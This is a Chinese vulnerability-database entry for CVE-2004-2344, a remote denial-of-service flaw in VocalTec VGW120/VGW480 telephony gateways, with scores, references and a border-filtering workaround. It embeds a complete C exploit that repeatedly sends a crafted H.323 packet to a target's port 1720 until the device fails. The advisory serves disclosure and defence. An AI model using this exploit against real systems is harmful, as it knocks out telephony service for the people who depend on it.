CVE-2004-2344
CVSS5.0
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:43:52
NMCOE    

[原文]Unknown vulnerability in the ASN.1/H.323/H.225 stack of VocalTec VGW120 and VGW480 allows remote attackers to cause a denial of service.


[CNNVD]VocalTec VGW120/ VGW480 Telephony Gateway远程H.225拒绝服务漏洞(CNNVD-200412-535)

        
        VocalTec VGW120/ VGW480是电话网关系统。
        VocalTec VGW120/ VGW480电话网关在处理部分H.323通信时存在问题,远程攻击者可以利用这个漏洞对设备进行拒绝服务攻击。
        提交特殊构建的H.323通信给VocalTec VGW120/ VGW480电话网关,会由于ASN.1/H.323/H.225堆栈发生问题而产生拒绝服务。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/h:vocaltec:vgw480_telephony_gateway
cpe:/h:vocaltec:vgw120_telephony_gateway

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2344
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2344
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-535
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/16240
(UNKNOWN)  XF  vocaltec-gateway-dos(16240)
http://www.securitylab.ru/45401.html
(VENDOR_ADVISORY)  MISC  http://www.securitylab.ru/45401.html
http://www.securityfocus.com/bid/10411
(UNKNOWN)  BID  10411

- 漏洞信息

VocalTec VGW120/ VGW480 Telephony Gateway远程H.225拒绝服务漏洞
中危 其他
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        
        VocalTec VGW120/ VGW480是电话网关系统。
        VocalTec VGW120/ VGW480电话网关在处理部分H.323通信时存在问题,远程攻击者可以利用这个漏洞对设备进行拒绝服务攻击。
        提交特殊构建的H.323通信给VocalTec VGW120/ VGW480电话网关,会由于ASN.1/H.323/H.225堆栈发生问题而产生拒绝服务。
        

- 公告与补丁

        厂商补丁:
        VocalTec
        --------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.vocaltec.com/

- 漏洞信息 (24143)

VocalTec VGW120/ VGW480 Telephony Gateway Remote H.225 Denial Of Service Vulnerability (EDBID:24143)
hardware dos
2004-05-24 Verified
0 Alexander
N/A [点击下载]
source: http://www.securityfocus.com/bid/10411/info

It has been reported that the VocalTec VGW120 and VGW480 Telephony Gateways are prone to a remote denial of service vulnerability. The issue is reported to exist in the ASN.1/H.323/H.225 stack.

A remote attacker may exploit this issue to deny service to the affected appliances. 

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <fcntl.h>
#include <netdb.h>
#include <unistd.h>
#include <errno.h>

#define H323_SIGNAL_PORT 1720

unsigned char kill_buff[] = {\
0x03, 0x00, 0x01, 0x57, 0x08, 0x02, 0x00, 0x04, 0x05, 0x04, 0x03, 0x80, 0x90, 0xa5, 0x6c, 0x0b,
0x81, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x70, 0x0c, 0x81, 0x31, 0x32,
0x33, 0x34, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x7e, 0x01, 0x2b, 0x05, 0x20, 0x80, 0x06,
0x00, 0x08, 0x91, 0x4a, 0x00, 0x04, 0x28, 0x00, 0xb5, 0x00, 0x00, 0x12, 0x40, 0x01, 0x3c, 0x05,
0x01, 0x00, 0x00, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x61, 0x62, 0x63, 0x64, 0x65,
0x66, 0x67, 0x68, 0x00, 0x8d, 0x1d, 0x82, 0x07, 0x00, 0xac, 0x10, 0x01, 0x01, 0x02, 0x9a, 0x11,
0x00, 0x62, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67,
0x68, 0x32, 0x02, 0x12, 0x00, 0x00, 0x00, 0x0d, 0x40, 0x01, 0x80, 0x0a, 0x04, 0x00, 0x01, 0x00,
0xac, 0x10, 0x01, 0x01, 0x47, 0xf1, 0x1d, 0x40, 0x00, 0x00, 0x06, 0x04, 0x01, 0x00, 0x4d, 0x40,
0x01, 0x80, 0x11, 0x14, 0x00, 0x01, 0x00, 0xac, 0x10, 0x01, 0x01, 0x47, 0xf0, 0x00, 0xac, 0x10,
0x01, 0x01, 0x47, 0xf1, 0x01, 0x00, 0x01, 0x00, 0x01, 0x80, 0x01, 0x80, 0x00, 0x0a, 0xa8, 0x01,
0x80, 0x6f, 0x01, 0x40, 0xb5, 0x00, 0x00, 0x12, 0x68, 0xe0, 0x01, 0x01, 0x00, 0x01, 0x1c, 0x58,
0x1c, 0x39, 0x9e, 0x01, 0x00, 0x03, 0x67, 0x74, 0x64, 0x00, 0x00, 0x00, 0x2e, 0x49, 0x41, 0x4d,
0x2c, 0x0d, 0x0a, 0x47, 0x43, 0x49, 0x2c, 0x33, 0x39, 0x61, 0x65, 0x65, 0x31, 0x35, 0x65, 0x62,
0x66, 0x31, 0x38, 0x31, 0x31, 0x64, 0x33, 0x38, 0x30, 0x30, 0x62, 0x64, 0x39, 0x63, 0x39, 0x65,
0x62, 0x30, 0x62, 0x31, 0x33, 0x35, 0x65, 0x0d, 0x0a, 0x0d, 0x0a, 0xa1, 0x04, 0x03, 0x90, 0x90,
0xa3, 0x18, 0x03, 0xa1, 0x83, 0x9f, 0x1e, 0x02, 0x81, 0x83, 0x70, 0x0c, 0x81, 0x37, 0x30, 0x39,
0x35, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x04, 0x80, 0x06, 0x00, 0x04, 0x00, 0x00, 0x00,
0x03, 0x35, 0x02, 0x04, 0x67, 0x74, 0x64, 0x01, 0x2e, 0x49, 0x41, 0x4d, 0x2c, 0x0d, 0x0a, 0x47,
0x43, 0x49, 0x2c, 0x33, 0x39, 0x61, 0x65, 0x65, 0x31, 0x35, 0x65, 0x62, 0x66, 0x31, 0x38, 0x31,
0x31, 0x64, 0x33, 0x38, 0x30, 0x30, 0x62, 0x64, 0x39, 0x63, 0x39, 0x65, 0x62, 0x30, 0x62, 0x31,
0x33, 0x35, 0x65, 0x0d, 0x0a, 0x0d, 0x0a};

int nuke_victim(char * ip)
{
 int sock;
 struct sockaddr_in vict_addr;
 
 if ((sock=socket(AF_INET, SOCK_STREAM, 0))==-1)
  {
  perror("nuke_victim()::socket()");
  return -1;
  }
 memset(&vict_addr, 0, sizeof(vict_addr));
 vict_addr.sin_family=AF_INET;
 inet_pton(AF_INET, ip, &vict_addr.sin_addr);
 vict_addr.sin_port=htons(H323_SIGNAL_PORT);
 if (connect(sock, (struct sockaddr *) &vict_addr, sizeof(vict_addr))==-1)
  {
  close(sock);
  if (errno==ECONNREFUSED) return 1;
  perror("nuke_victim()::connect()");
  return -1;
  }
 if (send(sock,kill_buff,sizeof(kill_buff),MSG_NOSIGNAL)!=sizeof(kill_buff))
  {
  close(sock);
  if (errno==EPIPE) return 1;
  perror("nuke_victim()::send()");
  return -1;
  }
 close(sock);
 return 0;
}

int main(int argc, char ** argv)
{
 int ret_flag=0;
 int try_count=0;
 if (argc<2)
  {
  fprintf(stderr, "Usage: %s <victim IP>\n", argv[0]);
  return 1;
  }
 while((ret_flag=nuke_victim(argv[1]))==0) 
  {
  try_count++;
  usleep(100000);
  }
 if (ret_flag==-1) printf("Execution aborted with internal error\n");
 if (ret_flag==1) printf("Victim %s successfully nuked with %d tryes\n", argv[1], try_count);
 return 0;
}

		

- 漏洞信息

6413
VocalTec Telephony Gateways H.323 DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

VGW480 and VGW120 contains a flaw that may allow a remote denial of service. The issue is triggered when malicious H.323 packets are processed at the telephone gateway, and will result in loss of availability for the platform.

- 时间线

2004-05-24 Unknow
2004-05-24 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s): Filter all H.323 traffic at the border

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站